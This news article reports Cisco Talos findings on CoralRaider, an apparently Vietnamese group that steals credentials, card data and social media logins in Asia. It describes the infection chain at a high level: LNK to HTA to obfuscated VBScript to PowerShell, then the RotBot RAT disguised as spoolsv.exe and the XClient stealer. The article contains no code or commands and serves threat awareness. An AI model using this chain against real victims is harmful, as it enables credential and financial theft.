CoralRaider Hackers Steals Login Credentials, Financial Data & Social Media Logins

A new threat actor dubbed “CoralRaider” targets victims’ financial information, login credentials, and social media profiles—including accounts for businesses and advertisements.

The group, which is of Vietnamese origin, has been active since at least 2023 and targets victims in several Asian and Southeast Asian countries. 

In the recent campaign, the attackers used XClient stealer and RotBot, a customized version of QuasarRAT, as payloads.

- Advertisement -

The IP address, ASN, and active processes on the victim’s computer are among several tests that RotBot, a remote access tool (RAT), runs on it to avoid detection. 

The XClient stealer offers significant information-stealing capabilities due to its plugin module and a variety of modules for conducting remote administration operations.

Notable Tactics, Techniques, And Procedures (TTPs) Employed

According to Cisco Talos reports, the attacker utilized two Telegram bots: a “debug” bot for debugging and an “online” bot for receiving victim data. 

On the other hand, the “debug” bot’s desktop image and Telegram looked identical to those of the “online” bot.

This demonstrated that, while testing the bot, the actor may have compromised their surroundings. 

Researchers’ investigation turned up two more pictures that showed several OneDrive folders. 

An Excel file that most likely contained the victims’ data was examined in another picture. The spreadsheet contains multiple tabs in Vietnamese. 

 “CoralRaider had hardcoded Vietnamese words in several stealer functions of their payload XClient stealer”, Talos researchers shared with Cyber Security News.

“The stealer function maps the stolen victim’s information to hardcoded Vietnamese words and writes them to a text file on the victim machine’s temporary folder before exfiltration”.

This malicious campaign is aimed at victims in South Korea, Bangladesh, Pakistan, Indonesia, Vietnam, India, China, and other countries in Asia and Southeast Asia. 

The Windows shortcut file serves as the campaign’s original vector. The actor’s method of giving the victims the LNKs is unknown at the moment.

A malicious Windows shortcut file that downloads and launches an HTML application file (HTA) from a download site under the attacker’s control is the first step in the attack.

An embedded, obfuscated Visual Basic script runs when the HTA file is opened.

The PowerShell script that is embedded in the memory by the malicious Visual Basic script decrypts and sequentially runs three other PowerShell scripts that download and launch the RotBot, disable Windows and application notifications, bypass User Access Controls, and perform anti-VM and anti-analysis checks. 

On the victim’s computer, RotBot is downloaded and launched under the guise of the Printer Subsystem program “spoolsv.exe.” The threat actor has assembled and customized a RotBot specifically for this campaign. 

The XClient Stealer takes use of victims’ browser data, credit card numbers, and social network login passwords.

It targets the data files for Chrome, Microsoft Edge, Opera, Brave, CocCoc, and Firefox browsers through the absolute paths of the corresponding browser installation paths. 

Lastly, the XClient stealer generates a ZIP package and saves the victim’s social media information, which is gathered into a text file in the local user profile temporary folder.

Use secure passwords and change them frequently to protect yourself from these dangerous attacks.

Is Your Network Under Attack? - Read CISO’s Guide to Avoiding the Next Breach - Download Free Guide